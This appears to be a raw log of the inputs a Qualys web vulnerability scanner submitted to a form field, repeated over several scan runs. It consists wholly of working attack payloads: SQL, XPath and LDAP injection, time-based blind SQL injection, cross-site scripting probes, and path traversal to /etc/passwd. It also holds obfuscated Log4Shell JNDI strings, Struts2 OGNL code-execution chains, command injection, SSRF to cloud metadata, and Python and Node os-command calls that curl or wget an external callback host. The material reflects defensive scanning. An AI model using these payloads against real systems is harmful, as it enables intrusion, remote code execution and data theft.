1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1
1' and 3789=1391 --
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl cd1936f3c78049a21baf868bfe1a8c98764cdb5f.17341103393642422.811974315.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 7f708aec41c5fb8f7c55973a3dd51d54c4170e13.17341103393642422.1898338453.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 867024e0a01b7d216eb251545f5a4a7d028b461b.17341103393642422.2042469654.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 80ebf379388b9c832d82cddfdc7aa56cd644fa48.17341103393642422.2984652210.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 8a4604e3d74cd110e9efb723b5480815ea676b71.17341103393642422.4173410079.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","2f5a1e7d121e1d0dddc91b137d6f82a70ee860df.17341103393642422.1895479319.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://e1bdb96671c23e5292bdb52e19dcae45b8ef96fd.17341103393642422.29532265.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://854788f008d689cb7179f14196cee769cc8bea3a.17341103393642422.4061957807.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//c65e3fbec569e3a67fcbc1a79968ddeff4ea32c0.17341103393642422.928034112.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://15d8948abfefd2c8169d8e7d02aa10e366f83c3c.17341103393642422.2875788775.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//9d8f92f5ebfc9984b7501f0a567bc711eab0938d.17341103393642422.4248640979.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://49e9ae87dc29163b2faab71c86fd9848e50a0e59.17341103393642422.3079429315.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//18942d2adca2e885c06359175dba6b4f375c7120.17341103393642422.3729451637.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://6ed89f80984bfb7c47ab242c0bc87a5ae9c06a31.17341103393642422.2203846011.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://b477cf4183c41bb3b4636bebbefa720c9e6020ba.17341103393642422.1415700185.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://f5a36b5dcad3f9b0814f835cdef293b5ab493727.17341103393642422.3278748425.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://643330d87bdfbea4dc494a047d87c070ada27a96.17341103393642422.3426133321.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
f4062f8131a7543728ece88025f37463a2c42116.17341103393642422.1467639452.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://35899c864f0323f637a1f064703e775110e87f07.17341103393642422.1195056850.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@501ac5279943de8dd78c9048ad7c1e15521aa9b0.17341103393642422.2043877741.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssdcB4M47h};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxss1s54rcL6()-"
1
'-qxsst2R3NnLY()-'
1
*/;(function(){qxssxhb34vAp});/*
1
9 ;(function(){qxss7LAXie7Y});//
1
9;(function(){qxssXl0jW4Dj});//
1
';(function(){qxssIl5R03y1});/**/'
1
qualys(aqxssaGEPRYaN)xyz
1
");(function(){qxssoS9zwM8H});/**/"
1
";(function(){qxss4yWntbXd});/**/"
1
javascript:qxss(X2996069292Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
1
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
;--
1
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssX2bq5129=7< /script>
1
" onEvent=X2996069292Y1_2Z
1
' onEvent=X2996069292Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssNn0o04TG=7")}
1
1">
1
1
"'>
1
1
1
1
1
1 _q_q=random(iYtGC8US)
1
_q=random(X2996069292Y1_2Z)
1
_q=random(X2996069292Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2996069292Y1_2Z);
" onEvent=X2996069292Y1_2Z
1
1
' onEvent=X2996069292Y1_2Z
1
_q=random(X2996069292Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
1
11 or 11=12
1
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 6313f81db2fc0d2ced69476d0513abff9070ed5c.17311985393642422.2415104883.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget af6f465b9f145b418ee3b73aba2c9b4238efd062.17311985393642422.2360346710.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl c8b8ee279c2b1d06fe5297768e82d3171c56b0ba.17311985393642422.3931643608.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 062b7d25a0b88398e6ee812d05acfad683a4411d.17311985393642422.1991496848.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl a70fd11472f7548d9ce672ac2b947f9e2d629c84.17311985393642422.1914865285.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","00833dfc55eebbc3c624fde9b2f88081f0472f88.17311985393642422.182651951.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://97ba10002c0da8a5853405183fe21f02ca99dfe9.17311985393642422.396607038.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://ecdf6f298e170c4e36a441c8d1a4abec144fdac1.17311985393642422.516972242.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//578da4748599bc3801813bf906ca20eb56b9b584.17311985393642422.1500938877.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://be9009cd907104e012c5b7ebd23ea2ae9d3358a4.17311985393642422.3906908141.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//4044aefbe0d62e65148e079be1f0122b0c5df27c.17311985393642422.2111308625.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://60c4c8d00a6a4f62d787a072dcef1c3409027ba1.17311985393642422.2609988005.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//c711714078caab2b650b3590d11dd1511788b103.17311985393642422.2432146149.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://7d4338d0eb31b53d0137920704f850bd4d14fef9.17311985393642422.581605164.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://ee0da2d5ab1484e7040240f3f42aeb35ec66845e.17311985393642422.3557170150.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://f57f819b17d9884aa6c4853417d72d2968be6a83.17311985393642422.3638481458.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://9451f02270797a4ee904d21a5d6865c2452e1b0d.17311985393642422.2771971768.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
b7872fbca7c9bf89bd32635e9edf2c910a50b898.17311985393642422.571047547.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://e631c682b60660a6e1b6b8f992780b8740612b2c.17311985393642422.1468907654.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@77d5c5ef7b8a8fe5fad0d7b0d97d8ad71d42d1d6.17311985393642422.473446657.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1)(|(uid=*)
1
1
1)(|(objectclass=*)
1*
1
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssXap0q1MI};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssa6AZ44E3()-"
1
'-qxss204ulGr5()-'
1
*/;(function(){qxss5LHpPCQw});/*
1
9 ;(function(){qxssk6311Lxk});//
1
9;(function(){qxss6ZM921Bn});//
1
';(function(){qxsspXJ7AH3S});/**/'
1
qualys(aqxssBg4GH3Q8)xyz
1
");(function(){qxss79RNPpy3});/**/"
1
";(function(){qxss132O4gI8});/**/"
1
javascript:qxss(X173485268Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qsscq6zvzWd=7< /script>
1
" onEvent=X173485268Y1_2Z
1
' onEvent=X173485268Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qsshvKvyvwa=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(JeCUg17i)
1
_q=random(X173485268Y1_2Z)
1
_q=random(X173485268Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X173485268Y1_2Z);
1
" onEvent=X173485268Y1_2Z
1
' onEvent=X173485268Y1_2Z
1
_q=random(X173485268Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
1
11 or 11=12
1
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 6a67e918ac65bf0865146b084e65697385539924.17280807393642422.3350207757.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 13ad2e5d93cb857cbb7af86cf4b67a29d3a69c72.17280807393642422.748075333.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 7ccfe3d5aa06a4b4359ed37431422460bfbbe863.17280807393642422.3721190282.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 646080846377cf64acd6de409d7bafccdf42b122.17280807393642422.837942488.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 222228ba0fe5c1e9fc376946cc21d043a5a1b3de.17280807393642422.4186690290.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","69e9def861496bf8a8ef21f5e4e47157c63d8106.17280807393642422.1052353474.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://e547b811d40fb53290809804bd9ea9dc0f2dea9c.17280807393642422.3310678392.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://05d11d9f29f703388a4b58ce15e248573385f9db.17280807393642422.1256595570.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//36609f611b97e4219381c7cab51df4d8b0775b37.17280807393642422.3802998367.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://157a65bf223db6befccebf0c5208a97082e5af13.17280807393642422.928034068.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//dcce2b0bab3e0d0b84eb4c32941e89c5f1e9609d.17280807393642422.742910680.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://9119f0cd1b8adaf25fd653d85e6c1bc0f75b62f3.17280807393642422.177079530.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//d9580f5eba7b0c42cdc8807b2ec8137a7ab21a48.17280807393642422.1086262243.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://0a17f66b11c1545b137cfcc225740afceb550968.17280807393642422.2005824099.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://11ed5fbe98b4199965d50c31bdfa2712016add45.17280807393642422.606581614.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://a89b84e6b359edc1ce3b5f499e5ec5618f30dc20.17280807393642422.858478708.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://32894795b0891add88ac71f7b9e0916d49f90c5b.17280807393642422.3996762010.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
14c8ddc147ea2674c9ee2fcfdf2baeed1798f0f1.17280807393642422.53144623.ssrf02.ssrf.eu2.qualysperiscope.com.
1
